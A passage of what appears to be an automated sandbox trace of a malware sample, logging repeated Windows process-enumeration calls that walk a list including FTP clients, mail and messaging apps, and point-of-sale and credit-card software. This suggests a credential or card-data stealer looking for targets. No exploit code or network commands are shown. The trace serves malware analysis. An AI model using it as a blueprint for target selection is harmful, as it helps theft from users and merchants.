th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0280.648] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0280.650] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0280.680] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0280.682] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0280.684] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0280.686] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0280.687] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0280.689] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0280.690] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0280.692] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0280.694] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0280.695] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0280.697] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0280.699] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0280.702] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0280.704] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0280.705] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0280.707] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0280.710] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0280.712] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0280.731] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0280.733] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0280.735] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0280.737] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0280.739] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0280.741] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0280.743] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0280.745] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0280.747] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0280.748] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0280.750] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0280.752] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0280.754] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0280.756] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0280.757] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0280.759] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0280.761] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0280.763] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0280.764] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0280.766] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0280.768] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0280.769] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0280.771] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0280.773] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0280.774] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0280.824] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0280.827] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0280.830] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0280.833] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0280.835] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0280.837] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0280.848] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0280.851] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0280.853] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0280.856] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0280.858] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0280.860] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0280.862] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0280.865] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0280.867] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0280.869] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0280.890] CloseHandle (hObject=0x21f8) returned 1 [0280.890] Sleep (dwMilliseconds=0x64) [0281.016] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0281.029] Process32First (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.031] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0281.033] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0281.035] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0281.038] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0281.040] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0281.063] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0281.066] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0281.068] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0281.070] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0281.072] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0281.110] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0281.112] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0281.115] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0281.117] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0281.119] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0281.121] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0281.123] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0281.126] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0281.128] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0281.130] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0281.132] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 